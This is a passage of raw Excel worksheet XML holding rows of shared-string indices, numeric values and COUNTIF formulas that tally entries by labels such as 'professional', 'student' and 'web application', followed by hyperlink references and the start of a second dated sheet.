      <c r="C28" s="70" t="s">
        <v>246</v>
      </c>
      <c r="D28" s="15" t="s">
        <v>30</v>
      </c>
      <c r="E28" s="95" t="s">
        <v>357</v>
      </c>
      <c r="F28" s="70" t="s">
        <v>358</v>
      </c>
      <c r="G28" s="104" t="s">
        <v>359</v>
      </c>
      <c r="H28" t="s">
        <v>248</v>
      </c>
      <c r="I28" s="82">
        <v>0.9</v>
      </c>
      <c r="J28">
        <v>100</v>
      </c>
      <c r="L28" s="102" t="s">
        <v>360</v>
      </c>
    </row>
    <row r="29" spans="1:13" ht="50.25" customHeight="1">
      <c r="A29">
        <v>29</v>
      </c>
      <c r="B29" s="94" t="s">
        <v>361</v>
      </c>
      <c r="D29" s="96" t="s">
        <v>263</v>
      </c>
      <c r="E29" s="70" t="s">
        <v>362</v>
      </c>
      <c r="F29" s="70" t="s">
        <v>333</v>
      </c>
      <c r="G29" t="s">
        <v>247</v>
      </c>
      <c r="H29" t="s">
        <v>254</v>
      </c>
      <c r="I29" s="82">
        <v>0</v>
      </c>
      <c r="J29">
        <v>10</v>
      </c>
      <c r="L29" t="s">
        <v>363</v>
      </c>
    </row>
    <row r="30" spans="1:13" ht="50.25" customHeight="1">
      <c r="A30">
        <v>32</v>
      </c>
      <c r="B30" s="94" t="s">
        <v>364</v>
      </c>
      <c r="C30" s="70" t="s">
        <v>241</v>
      </c>
      <c r="D30" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E30" s="70" t="s">
        <v>365</v>
      </c>
      <c r="F30" s="95" t="s">
        <v>366</v>
      </c>
      <c r="G30" t="s">
        <v>247</v>
      </c>
      <c r="I30" s="82">
        <v>0.1</v>
      </c>
      <c r="J30">
        <v>30</v>
      </c>
      <c r="L30" s="96" t="s">
        <v>367</v>
      </c>
    </row>
    <row r="31" spans="1:13" ht="50.25" customHeight="1">
      <c r="A31">
        <v>35</v>
      </c>
      <c r="B31" s="94" t="s">
        <v>368</v>
      </c>
      <c r="D31" s="96" t="s">
        <v>263</v>
      </c>
      <c r="E31" s="70" t="s">
        <v>369</v>
      </c>
      <c r="F31" s="95" t="s">
        <v>370</v>
      </c>
      <c r="G31" t="s">
        <v>247</v>
      </c>
      <c r="H31" t="s">
        <v>254</v>
      </c>
      <c r="I31" s="82">
        <v>0.01</v>
      </c>
      <c r="J31">
        <v>20</v>
      </c>
      <c r="L31" t="s">
        <v>371</v>
      </c>
    </row>
    <row r="32" spans="1:13" ht="50.25" customHeight="1">
      <c r="A32">
        <v>38</v>
      </c>
      <c r="B32" s="94" t="s">
        <v>372</v>
      </c>
      <c r="C32" s="70" t="s">
        <v>241</v>
      </c>
      <c r="D32" s="96" t="s">
        <v>263</v>
      </c>
      <c r="E32" s="70" t="s">
        <v>373</v>
      </c>
      <c r="F32" s="70" t="s">
        <v>374</v>
      </c>
      <c r="G32" t="s">
        <v>247</v>
      </c>
      <c r="H32" t="s">
        <v>254</v>
      </c>
      <c r="I32" s="82">
        <v>0.01</v>
      </c>
      <c r="J32">
        <v>20</v>
      </c>
      <c r="L32" s="96" t="s">
        <v>375</v>
      </c>
    </row>
    <row r="33" spans="1:12" ht="50.25" customHeight="1">
      <c r="A33">
        <v>40</v>
      </c>
      <c r="B33" s="94" t="s">
        <v>376</v>
      </c>
      <c r="C33" s="70" t="s">
        <v>301</v>
      </c>
      <c r="D33" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E33" s="70" t="s">
        <v>377</v>
      </c>
      <c r="F33" s="95" t="s">
        <v>378</v>
      </c>
      <c r="G33" t="s">
        <v>247</v>
      </c>
      <c r="H33" t="s">
        <v>291</v>
      </c>
      <c r="I33" s="82">
        <v>0.1</v>
      </c>
      <c r="J33">
        <v>20</v>
      </c>
      <c r="L33" s="96" t="s">
        <v>379</v>
      </c>
    </row>
    <row r="34" spans="1:12" ht="50.25" customHeight="1">
      <c r="A34">
        <v>41</v>
      </c>
      <c r="B34" s="94" t="s">
        <v>380</v>
      </c>
      <c r="C34" s="70" t="s">
        <v>241</v>
      </c>
      <c r="D34" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E34" s="70">
        <v>64</v>
      </c>
      <c r="F34" s="95" t="s">
        <v>381</v>
      </c>
      <c r="G34" t="s">
        <v>247</v>
      </c>
      <c r="H34" t="s">
        <v>382</v>
      </c>
      <c r="I34" s="82">
        <v>0.01</v>
      </c>
      <c r="J34">
        <v>15</v>
      </c>
      <c r="L34" s="96" t="s">
        <v>383</v>
      </c>
    </row>
    <row r="35" spans="1:12" ht="50.25" customHeight="1">
      <c r="A35">
        <v>42</v>
      </c>
      <c r="B35" s="107" t="s">
        <v>384</v>
      </c>
      <c r="C35" s="70" t="s">
        <v>241</v>
      </c>
      <c r="D35" s="96" t="s">
        <v>263</v>
      </c>
      <c r="E35" s="70">
        <v>176</v>
      </c>
      <c r="F35" s="70" t="s">
        <v>385</v>
      </c>
      <c r="G35" t="s">
        <v>247</v>
      </c>
      <c r="H35" t="s">
        <v>291</v>
      </c>
      <c r="I35" s="82">
        <v>0</v>
      </c>
      <c r="J35">
        <v>15</v>
      </c>
      <c r="L35" s="96" t="s">
        <v>386</v>
      </c>
    </row>
    <row r="36" spans="1:12" ht="50.25" customHeight="1">
      <c r="A36">
        <v>45</v>
      </c>
      <c r="B36" s="107" t="s">
        <v>387</v>
      </c>
      <c r="C36" s="70" t="s">
        <v>388</v>
      </c>
      <c r="D36" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E36" s="70" t="s">
        <v>389</v>
      </c>
      <c r="F36" s="95" t="s">
        <v>390</v>
      </c>
      <c r="G36" t="s">
        <v>247</v>
      </c>
      <c r="H36" t="s">
        <v>254</v>
      </c>
      <c r="I36" s="82">
        <v>0.05</v>
      </c>
      <c r="J36">
        <v>60</v>
      </c>
      <c r="L36" s="96" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="37" spans="1:12" ht="50.25" customHeight="1">
      <c r="A37">
        <v>48</v>
      </c>
      <c r="B37" s="94" t="s">
        <v>392</v>
      </c>
      <c r="C37" s="70" t="s">
        <v>241</v>
      </c>
      <c r="D37" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E37" s="70" t="s">
        <v>393</v>
      </c>
      <c r="F37" s="95" t="s">
        <v>394</v>
      </c>
      <c r="G37" s="110" t="s">
        <v>395</v>
      </c>
      <c r="H37" s="96" t="s">
        <v>396</v>
      </c>
      <c r="I37" s="82">
        <v>0.2</v>
      </c>
      <c r="J37" t="s">
        <v>397</v>
      </c>
      <c r="L37" s="102" t="s">
        <v>398</v>
      </c>
    </row>
    <row r="38" spans="1:12" ht="50.25" customHeight="1">
      <c r="A38">
        <v>50</v>
      </c>
      <c r="B38" s="94" t="s">
        <v>399</v>
      </c>
      <c r="C38" s="70" t="s">
        <v>312</v>
      </c>
      <c r="D38" s="96" t="s">
        <v>263</v>
      </c>
      <c r="E38" s="70">
        <v>198</v>
      </c>
      <c r="F38" s="95" t="s">
        <v>400</v>
      </c>
      <c r="G38" t="s">
        <v>253</v>
      </c>
      <c r="H38" t="s">
        <v>254</v>
      </c>
      <c r="I38" s="82">
        <v>0.15</v>
      </c>
      <c r="J38">
        <v>20</v>
      </c>
      <c r="L38" s="96" t="s">
        <v>401</v>
      </c>
    </row>
    <row r="39" spans="1:12" ht="50.25" customHeight="1">
      <c r="A39">
        <v>52</v>
      </c>
      <c r="B39" s="94" t="s">
        <v>402</v>
      </c>
      <c r="C39" s="70" t="s">
        <v>246</v>
      </c>
      <c r="D39" s="15" t="s">
        <v>242</v>
      </c>
      <c r="E39" s="70">
        <v>345</v>
      </c>
      <c r="F39" s="70" t="s">
        <v>403</v>
      </c>
      <c r="G39" t="s">
        <v>253</v>
      </c>
      <c r="H39" t="s">
        <v>254</v>
      </c>
      <c r="I39" s="82">
        <v>0.01</v>
      </c>
      <c r="J39">
        <v>20</v>
      </c>
      <c r="L39" s="96" t="s">
        <v>404</v>
      </c>
    </row>
    <row r="55" spans="3:9">
      <c r="D55" s="15">
        <f>COUNTIF(D2:D37,"professional")</f>
        <v>17</v>
      </c>
    </row>
    <row r="56" spans="3:9">
      <c r="D56" s="15">
        <f>COUNTIF(D2:D37,"student")</f>
        <v>2</v>
      </c>
    </row>
    <row r="57" spans="3:9">
      <c r="D57" s="15">
        <f>COUNTIF(D2:D37,"tutorial")</f>
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="3:9" ht="15.75">
      <c r="C59" s="112"/>
      <c r="D59" s="112"/>
      <c r="E59" s="124" t="s">
        <v>3</v>
      </c>
      <c r="F59" s="124"/>
      <c r="G59" s="70"/>
    </row>
    <row r="60" spans="3:9" ht="15.75">
      <c r="C60" s="113"/>
      <c r="D60" s="121" t="s">
        <v>2</v>
      </c>
      <c r="E60" s="111" t="s">
        <v>30</v>
      </c>
      <c r="F60" s="111" t="s">
        <v>405</v>
      </c>
      <c r="G60" s="70"/>
    </row>
    <row r="61" spans="3:9" ht="15.75">
      <c r="C61" s="124" t="s">
        <v>406</v>
      </c>
      <c r="D61" s="121" t="s">
        <v>241</v>
      </c>
      <c r="E61" s="114">
        <f>COUNTIFS(D2:D37,"student",C2:C37,"web application")</f>
        <v>0</v>
      </c>
      <c r="F61" s="114">
        <f>COUNTIFS(D2:D37,"*prof*",C2:C37,"web application")</f>
        <v>17</v>
      </c>
      <c r="G61" s="70"/>
    </row>
    <row r="62" spans="3:9" ht="15.75">
      <c r="C62" s="124"/>
      <c r="D62" s="121" t="s">
        <v>407</v>
      </c>
      <c r="E62" s="114">
        <f>COUNTIFS(D2:D37,"student",C2:C37,"library")</f>
        <v>0</v>
      </c>
      <c r="F62" s="114">
        <f>COUNTIFS(D2:D37,"*prof*",C2:C37,"library")</f>
        <v>0</v>
      </c>
      <c r="G62" s="70"/>
    </row>
    <row r="64" spans="3:9">
      <c r="C64" s="115"/>
      <c r="D64" s="125" t="s">
        <v>75</v>
      </c>
      <c r="E64" s="125"/>
      <c r="F64" s="125" t="s">
        <v>87</v>
      </c>
      <c r="G64" s="125"/>
      <c r="H64" s="125" t="s">
        <v>408</v>
      </c>
      <c r="I64" s="125"/>
    </row>
    <row r="65" spans="3:9">
      <c r="C65" s="126" t="s">
        <v>406</v>
      </c>
      <c r="D65" s="118" t="s">
        <v>409</v>
      </c>
      <c r="E65" s="118" t="s">
        <v>410</v>
      </c>
      <c r="F65" s="118" t="s">
        <v>409</v>
      </c>
      <c r="G65" s="118" t="s">
        <v>410</v>
      </c>
      <c r="H65" s="119" t="s">
        <v>409</v>
      </c>
      <c r="I65" s="118" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="66" spans="3:9">
      <c r="C66" s="126"/>
      <c r="D66" s="115"/>
      <c r="E66" s="116"/>
      <c r="F66" s="115"/>
      <c r="G66" s="115"/>
      <c r="H66" s="117"/>
      <c r="I66" s="117"/>
    </row>
    <row r="67" spans="3:9">
      <c r="C67" s="126"/>
      <c r="D67" s="115"/>
      <c r="E67" s="116"/>
      <c r="F67" s="115"/>
      <c r="G67" s="115"/>
      <c r="H67" s="117"/>
      <c r="I67" s="117"/>
    </row>
    <row r="68" spans="3:9">
      <c r="C68" s="115"/>
      <c r="D68" s="115"/>
      <c r="E68" s="116"/>
      <c r="F68" s="115"/>
      <c r="G68" s="115"/>
      <c r="H68" s="117"/>
      <c r="I68" s="117"/>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="E59:F59"/>
    <mergeCell ref="H64:I64"/>
    <mergeCell ref="F64:G64"/>
    <mergeCell ref="D64:E64"/>
    <mergeCell ref="C65:C67"/>
    <mergeCell ref="C61:C62"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="B2" r:id="rId1" xr:uid="{3350ABE4-1099-4DDD-B136-1CD667B27ECB}"/>
    <hyperlink ref="B4" r:id="rId2" xr:uid="{E57D21F6-01A8-4BCF-A20E-ECC37F9E317D}"/>
    <hyperlink ref="B5" r:id="rId3" xr:uid="{D6D91EE7-B687-4FAC-BC8C-11CCC0EBC1B3}"/>
    <hyperlink ref="B6" r:id="rId4" xr:uid="{DCB0E97C-826A-46D1-BDF4-47C2BD6E8AFE}"/>
    <hyperlink ref="B8" r:id="rId5" xr:uid="{8CC68067-E3B5-4E9A-B5DF-D95A33491980}"/>
    <hyperlink ref="B9" r:id="rId6" xr:uid="{D1DDC661-CD56-4D1F-8C4A-4FF2AB9950B8}"/>
    <hyperlink ref="B10" r:id="rId7" xr:uid="{C1451C87-3FF2-413F-8F3A-CB528238AB08}"/>
    <hyperlink ref="B11" r:id="rId8" xr:uid="{D9C6E2E4-03A3-4575-8642-1ABE75F2AC01}"/>
    <hyperlink ref="B12" r:id="rId9" xr:uid="{5C16979A-B7CF-49DF-BC17-DCEA720C7E89}"/>
    <hyperlink ref="B13" r:id="rId10" xr:uid="{917BB01D-7289-43DA-9C18-803D32A26462}"/>
    <hyperlink ref="B14" r:id="rId11" xr:uid="{802E7790-1A1A-4DDB-B96B-47D8AD404403}"/>
    <hyperlink ref="B15" r:id="rId12" xr:uid="{107A17CE-1B70-4886-9624-9E2D5596962D}"/>
    <hyperlink ref="B16" r:id="rId13" xr:uid="{1D9D62B0-E8FA-4BB3-A5B6-AA80AA5533CC}"/>
    <hyperlink ref="B17" r:id="rId14" xr:uid="{BE9FFB87-20F4-46B2-A68F-31411FA08FD9}"/>
    <hyperlink ref="B18" r:id="rId15" xr:uid="{AD1F9FCF-7516-4971-97EB-88D56F97055D}"/>
    <hyperlink ref="B19" r:id="rId16" xr:uid="{D148846C-3CF6-46F3-B005-7DB25071EE85}"/>
    <hyperlink ref="B20" r:id="rId17" xr:uid="{C3701712-5168-4489-B7E1-2B4103E592B3}"/>
    <hyperlink ref="B21" r:id="rId18" xr:uid="{1550BB54-F73D-4CCF-B2B7-217E4709D583}"/>
    <hyperlink ref="B22" r:id="rId19" xr:uid="{488F8434-D59C-4777-920B-77B66BD93BD7}"/>
    <hyperlink ref="B23" r:id="rId20" xr:uid="{BEEE0A15-07B5-49BA-8E5D-9794AF4A9B5E}"/>
    <hyperlink ref="B3" r:id="rId21" xr:uid="{9E174604-EA40-450A-B7EC-05AE704C1DEA}"/>
    <hyperlink ref="B24" r:id="rId22" xr:uid="{1A41B8EB-55BE-4FBF-94D9-A3652DF16DB8}"/>
    <hyperlink ref="B25" r:id="rId23" xr:uid="{736C0D95-5880-49C5-97E1-D391DFCBB642}"/>
    <hyperlink ref="B26" r:id="rId24" xr:uid="{EE88715E-7E06-41B8-87A3-37E317446C0A}"/>
    <hyperlink ref="B27" r:id="rId25" xr:uid="{BD144A16-FDF2-467E-8278-2DB3AE1F6BDA}"/>
    <hyperlink ref="B28" r:id="rId26" xr:uid="{9CD15485-2216-47EF-89E5-86B28835508B}"/>
    <hyperlink ref="B29" r:id="rId27" xr:uid="{D85BFD28-C395-478F-B501-BC97F0CF1844}"/>
    <hyperlink ref="B30" r:id="rId28" xr:uid="{2B12A827-ADE7-4FE8-A3E2-E9D6DDDBBA3E}"/>
    <hyperlink ref="B31" r:id="rId29" xr:uid="{3CC70EE9-2314-4182-AD6D-E402031A99BC}"/>
    <hyperlink ref="B32" r:id="rId30" xr:uid="{784C7E17-4CFD-4348-8611-D93AD579E0B3}"/>
    <hyperlink ref="B33" r:id="rId31" xr:uid="{ADF154BE-23A8-4484-956D-899F50CF59A9}"/>
    <hyperlink ref="B34" r:id="rId32" xr:uid="{1EB2E0D7-B81C-4EDD-A39F-49548F279A6B}"/>
    <hyperlink ref="B35" r:id="rId33" xr:uid="{202A8083-4512-42E7-B5EC-8536831E15BE}"/>
    <hyperlink ref="B36" r:id="rId34" xr:uid="{35B11D7B-4AB7-4B3D-A53F-FECA1FC4C4A4}"/>
    <hyperlink ref="B37" r:id="rId35" xr:uid="{2A2F6B42-A99E-48CE-BFE2-5EEFA40C8EAD}"/>
    <hyperlink ref="B38" r:id="rId36" xr:uid="{73C6948C-A2EB-4C31-B2C6-9F7D55A40DF1}"/>
    <hyperlink ref="B39" r:id="rId37" xr:uid="{663632FA-CDFE-46BE-A554-A8E1C5EA945F}"/>
  </hyperlinks>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <legacyDrawing r:id="rId3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6755D-5602-4DC6-A66E-A91823B6C7C3}">
  <dimension ref="A1:P165"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="C103" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="D122" sqref="D122"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="14.42578125" customWidth="1"/>
    <col min="2" max="2" width="80.7109375" customWidth="1"/>
    <col min="3" max="3" width="18" style="11" customWidth="1"/>
    <col min="4" max="4" width="15.85546875" style="11" customWidth="1"/>
    <col min="5" max="5" width="12" customWidth="1"/>
    <col min="6" max="6" width="26.85546875" customWidth="1"/>
    <col min="7" max="7" width="14.140625" customWidth="1"/>
    <col min="8" max="8" width="214.85546875" customWidth="1"/>
    <col min="9" max="9" width="22.28515625" style="20" customWidth="1"/>
    <col min="10" max="10" width="19" style="8" customWidth="1"/>
    <col min="11" max="11" width="40.7109375" customWidth="1"/>
    <col min="12" max="12" width="19.85546875" bestFit="1" customWidth="1"/>
    <col min="13" max="14" width="8.140625" bestFit="1" customWidth="1"/>
    <col min="15" max="15" width="9.7109375" bestFit="1" customWidth="1"/>
    <col min="16" max="18" width="11.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:11">
      <c r="A1" s="1" t="s">
        <v>411</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="12" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="12" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="1" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="19" t="s">
        <v>237</v>
      </c>
      <c r="J1" s="53" t="s">
        <v>412</v>
      </c>
      <c r="K1" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="2" spans="1:11" ht="45.75">
      <c r="A2" s="6">
        <v>45148</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>413</v>
      </c>
      <c r="C2" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D2" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E2">
        <v>111</v>
      </c>
      <c r="F2" t="s">
        <v>415</v>
      </c>
      <c r="G2" t="s">
        <v>416</v>
      </c>
      <c r="H2" t="s">
        <v>417</v>
      </c>
      <c r="I2" s="20" t="s">
        <v>418</v>
      </c>
      <c r="J2" s="8">
        <v>90</v>
      </c>
      <c r="K2" t="s">
        <v>419</v>
      </c>
    </row>
    <row r="3" spans="1:11" ht="45.75">
      <c r="A3" s="6">
        <v>45148</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>420</v>
      </c>
      <c r="C3" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D3" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E3">
        <v>177</v>
      </c>
      <c r="F3" t="s">
        <v>190</v>
      </c>
      <c r="G3" t="s">
        <v>14</v>
      </c>
      <c r="H3" t="s">
        <v>85</v>
      </c>
      <c r="I3" s="20">
        <v>0</v>
      </c>
      <c r="J3" s="8">
        <v>20</v>
      </c>
      <c r="K3" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="4" spans="1:11" ht="30.75">
      <c r="A4" s="6">
        <v>45148</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>356</v>
      </c>
      <c r="C4" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D4" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E4">
        <v>170</v>
      </c>
      <c r="F4" t="s">
        <v>37</v>
      </c>
      <c r="G4" t="s">
        <v>421</v>
      </c>
      <c r="H4" t="s">
        <v>422</v>
      </c>
      <c r="I4" s="20" t="s">
        <v>423</v>
      </c>
      <c r="J4" s="8">
        <v>10</v>
      </c>
      <c r="K4" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="5" spans="1:11" ht="45.75">
      <c r="A5" s="6">
        <v>45148</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>424</v>
      </c>
      <c r="C5" s="10" t="s">
        <v>425</v>
      </c>
      <c r="D5" s="10" t="s">
        <v>425</v>
      </c>
      <c r="F5" t="s">
        <v>425</v>
      </c>
      <c r="G5" t="s">
        <v>421</v>
      </c>
      <c r="K5" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="6" spans="1:11" ht="45.75">
      <c r="A6" s="6">
        <v>45148</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>361</v>
      </c>
      <c r="C6" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D6" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E6">
        <v>76</v>
      </c>
      <c r="F6" t="s">
        <v>427</v>
      </c>
      <c r="G6" s="22" t="s">
        <v>14</v>
      </c>
      <c r="H6" t="s">
        <v>85</v>
      </c>
      <c r="I6" s="20">
        <v>0</v>
      </c>
      <c r="J6" s="8">
        <v>25</v>
      </c>
      <c r="K6" t="s">
        <v>428</v>
      </c>
    </row>
    <row r="7" spans="1:11" ht="30.75">
      <c r="A7" s="6">
        <v>45148</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>399</v>
      </c>
      <c r="C7" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D7" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E7">
        <v>198</v>
      </c>
      <c r="F7" t="s">
        <v>429</v>
      </c>
      <c r="G7" s="52" t="s">
        <v>421</v>
      </c>
      <c r="H7" t="s">
        <v>430</v>
      </c>
      <c r="I7" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J7" s="8">
        <v>10</v>
      </c>
      <c r="K7" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="8" spans="1:11" ht="30.75">
      <c r="A8" s="6">
        <v>45148</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>402</v>
      </c>
      <c r="C8" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D8" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E8">
        <v>345</v>
      </c>
      <c r="F8" t="s">
        <v>37</v>
      </c>
      <c r="G8" t="s">
        <v>421</v>
      </c>
      <c r="H8" t="s">
        <v>432</v>
      </c>
      <c r="I8" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J8" s="8">
        <v>10</v>
      </c>
      <c r="K8" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="9" spans="1:11" ht="45.75">
      <c r="A9" s="6">
        <v>45148</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>433</v>
      </c>
      <c r="C9" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D9" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E9">
        <v>63</v>
      </c>
      <c r="F9" t="s">
        <v>227</v>
      </c>
      <c r="G9" t="s">
        <v>421</v>
      </c>
      <c r="H9" t="s">
        <v>434</v>
      </c>
      <c r="I9" s="20" t="s">
        <v>435</v>
      </c>
      <c r="J9" s="8">
        <v>10</v>
      </c>
      <c r="K9" t="s">
        <v>436</v>
      </c>
    </row>
    <row r="10" spans="1:11" ht="30.75">
      <c r="A10" s="6">
        <v>45148</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>437</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D10" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E10">
        <v>45</v>
      </c>
      <c r="F10" t="s">
        <v>37</v>
      </c>
      <c r="G10" t="s">
        <v>421</v>
      </c>
      <c r="H10" t="s">
        <v>438</v>
      </c>
      <c r="I10" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J10" s="8">
        <v>10</v>
      </c>
      <c r="K10" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="11" spans="1:11" ht="45.75">
      <c r="A11" s="6">
        <v>45148</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>439</v>
      </c>
      <c r="C11" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D11" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E11">
        <v>61</v>
      </c>
      <c r="F11" t="s">
        <v>427</v>
      </c>
      <c r="G11" t="s">
        <v>421</v>
      </c>
      <c r="H11" t="s">
        <v>440</v>
      </c>
      <c r="I11" s="20" t="s">
        <v>441</v>
      </c>
      <c r="J11" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="12" spans="1:11" ht="45.75">
      <c r="A12" s="6">
        <v>45148</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>442</v>
      </c>
      <c r="C12" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D12" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E12">
        <v>65</v>
      </c>
      <c r="F12" t="s">
        <v>37</v>
      </c>
      <c r="G12" t="s">
        <v>14</v>
      </c>
      <c r="H12" t="s">
        <v>85</v>
      </c>
      <c r="I12" s="20">
        <v>0</v>
      </c>
      <c r="J12" s="8">
        <v>30</v>
      </c>
      <c r="K12" t="s">
        <v>443</v>
      </c>
    </row>
    <row r="13" spans="1:11" ht="30.75">
      <c r="A13" s="6">
        <v>45148</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>444</v>
      </c>
      <c r="C13" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D13" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E13">
        <v>374</v>
      </c>
      <c r="F13" t="s">
        <v>37</v>
      </c>
      <c r="G13" s="52" t="s">
        <v>421</v>
      </c>
      <c r="H13" t="s">
        <v>445</v>
      </c>
      <c r="I13" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J13" s="8">
        <v>10</v>
      </c>
      <c r="K13" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="14" spans="1:11" ht="45.75">
      <c r="A14" s="6">
        <v>45148</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>446</v>
      </c>
      <c r="C14" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D14" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E14">
        <v>18</v>
      </c>
      <c r="F14" t="s">
        <v>415</v>
      </c>
      <c r="G14" t="s">
        <v>421</v>
      </c>
      <c r="H14" t="s">
        <v>445</v>
      </c>
      <c r="I14" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J14" s="8">
        <v>10</v>
      </c>
      <c r="K14" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="15" spans="1:11" ht="45.75">
      <c r="A15" s="6">
        <v>45152</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>447</v>
      </c>
      <c r="C15" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D15" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E15">
        <v>76</v>
      </c>
      <c r="F15" t="s">
        <v>140</v>
      </c>
      <c r="G15" t="s">
        <v>421</v>
      </c>
      <c r="H15" t="s">
        <v>449</v>
      </c>
      <c r="I15" s="20" t="s">
        <v>450</v>
      </c>
      <c r="J15" s="8">
        <v>25</v>
      </c>
    </row>
    <row r="16" spans="1:11" ht="45.75">
      <c r="A16" s="6">
        <v>45148</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>451</v>
      </c>
      <c r="C16" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D16" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E16">
        <v>183</v>
      </c>
      <c r="F16" t="s">
        <v>227</v>
      </c>
      <c r="G16" t="s">
        <v>421</v>
      </c>
      <c r="H16" t="s">
        <v>452</v>
      </c>
      <c r="I16" s="20" t="s">
        <v>423</v>
      </c>
      <c r="J16" s="8">
        <v>10</v>
      </c>
      <c r="K16" t="s">
        <v>296</v>
      </c>
    </row>
    <row r="17" spans="1:11" ht="30.75">
      <c r="A17" s="6">
        <v>45152</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>245</v>
      </c>
      <c r="C17" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D17" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E17">
        <v>234</v>
      </c>
      <c r="F17" t="s">
        <v>140</v>
      </c>
      <c r="G17" t="s">
        <v>421</v>
      </c>
      <c r="H17" t="s">
        <v>453</v>
      </c>
      <c r="I17" s="20" t="s">
        <v>431</v>
      </c>
      <c r="J17" s="8">
        <v>10</v>
      </c>
      <c r="K17" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="18" spans="1:11" ht="30.75">
      <c r="A18" s="6">
        <v>45152</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>251</v>
      </c>
      <c r="C18" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D18" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E18">
        <v>27</v>
      </c>
      <c r="F18" t="s">
        <v>37</v>
      </c>
      <c r="G18" t="s">
        <v>14</v>
      </c>
      <c r="H18" t="s">
        <v>85</v>
      </c>
      <c r="I18" s="20" t="s">
        <v>455</v>
      </c>
      <c r="J18" s="8">
        <v>30</v>
      </c>
    </row>
    <row r="19" spans="1:11" ht="45.75">
      <c r="A19" s="6">
        <v>45152</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>257</v>
      </c>
      <c r="C19" s="10" t="s">
        <v>448</v>
      </c>
      <c r="D19" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E19">
        <v>96</v>
      </c>
      <c r="F19" t="s">
        <v>427</v>
      </c>
      <c r="G19" t="s">
        <v>421</v>
      </c>
      <c r="H19" t="s">
        <v>453</v>
